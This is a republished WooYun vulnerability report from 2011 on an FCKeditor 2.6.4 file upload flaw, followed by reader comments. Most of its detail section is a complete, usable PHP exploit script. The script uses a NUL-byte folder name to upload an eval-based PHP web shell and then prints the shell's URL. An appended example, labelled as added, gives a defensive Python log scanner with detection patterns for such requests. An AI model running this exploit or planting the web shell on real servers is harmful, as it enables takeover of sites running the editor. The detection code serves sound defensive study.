fckeditor 2.6 php, fckeditor <= 2.6.4 arbitrary file upload vulnerability

Published: 2024/8/1 php 37 豆豆

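Vulnerability summary

Bug ID: WooYun-2011-01684

Title: fckeditor <= 2.6.4 arbitrary file upload vulnerability

Vendor: fckeditor

Author: 我勒個去

Submitted: 2011-03-22 14:09

Disclosed: 2011-03-22 14:18

Type: File upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Tags:

Vulnerability details

Disclosure status:

2011-03-22: Actively contacting the vendor and waiting for the vendor to claim the report; details not public

2011-03-22: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

fckeditor <= 2.6.4 arbitrary file upload vulnerability. The PHP and ColdFusion versions should be KO'd, ASP is unfazed, and other language versions are untested.

Detailed description:

The filtering of currentfolder is not up to the job, though GPC is enough to cripple it.

Proof of concept: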

set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));
$match = array();

function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    print $resp;
    return $resp;
}

function connector_response($html)
{
    global $match;
    return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}

print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";
print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /\n";
    print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
    die();
}

$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);

$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";

$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet.= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

print $packet;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>


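Fix:

See **.**.**.** for the fix

Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined

Vulnerability Rank: 12 (WooYun assessment)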
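
Added example, not part of the original advisory or of FCKeditor's code: a log check for the request shape this report describes, an upload to the file-manager connector whose CurrentFolder value carries a NUL byte or a script-like extension. The log lines, addresses and reason labels are constructed for illustration; the tests in folder_problems() are also what a connector should enforce on CurrentFolder before it builds a path.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (addresses and folder names are made up).
CONNECTOR = "/FCKeditor/editor/filemanager/connectors/php/connector.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - [22/Mar/2011:14:20:01 +0800] "POST {CONNECTOR}'
    '?Command=FileUpload&Type=Image&CurrentFolder=/albums/ HTTP/1.1" 200 120',
    f'192.0.2.77 - - [22/Mar/2011:14:21:09 +0800] "POST {CONNECTOR}'
    '?Command=FileUpload&Type=Image&CurrentFolder=x.php%00.gif HTTP/1.0" 200 131',
    '192.0.2.10 - - [22/Mar/2011:14:22:30 +0800] "GET /index.php?page=2 HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Any language flavour of the connector: connectors/php/, connectors/cfm/, ...
CONNECTOR_RE = re.compile(r"/filemanager/connectors/[^/]+/connector\.\w+$", re.I)
# A script extension anywhere in the folder value, even if more text follows it.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|cfm|aspx?|jsp)(?![A-Za-z0-9])", re.I)

def folder_problems(folder):
    """Reasons a URL-decoded CurrentFolder value should be rejected."""
    problems = []
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in folder):
        problems.append("nul-or-control-byte")  # %00 decodes to chr(0)
    if ".." in re.split(r"[\\/]", folder):
        problems.append("path-traversal")
    if SCRIPT_EXT_RE.search(folder):
        problems.append("script-extension")
    return problems

def scan(lines):
    """Return (line number, client, problems) for suspicious connector requests."""
    hits = []
    for number, line in enumerate(lines, 1):
        request = REQUEST_RE.search(line)
        if not request:
            continue
        url = urlsplit(request.group("target"))
        if not CONNECTOR_RE.search(url.path):
            continue
        # Parameter names are matched case-insensitively; values are decoded once.
        params = parse_qs(url.query, keep_blank_values=True)
        folders = [v for k, vs in params.items() if k.lower() == "currentfolder" for v in vs]
        for folder in folders:
            problems = folder_problems(folder)
            if problems:
                hits.append((number, line.split()[0], problems))
    return hits
```

Run over the constructed log, scan(SAMPLE_LOG) flags only the second line; a legitimate folder such as /albums/ passes.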

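Comments

2010-01-01 00:00 xsser (White hat | Rank: 152, Vulnerabilities: 17)

2010-01-01 00:00 Jacks (White hat | Rank: 142, Vulnerabilities: 25)

Why does this code look so familiar? Isn't it the one EgiX wrote?

2010-01-01 00:00 m0r5 (White hat | Rank: 30, Vulnerabilities: 6)

Isn't this the one EgiX wrote?

2010-01-01 00:00 霍家二爺 (White hat | Rank: 63, Vulnerabilities: 7)

http://seclists.org/pen-test/2010/Jul/0

Truncation, oh, truncation

2010-01-01 00:00 G8dSnow (White hat | Rank: 21, Vulnerabilities: 5)

Truncation is hitting everywhere, in XSS and in file operations alike... can't take it...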
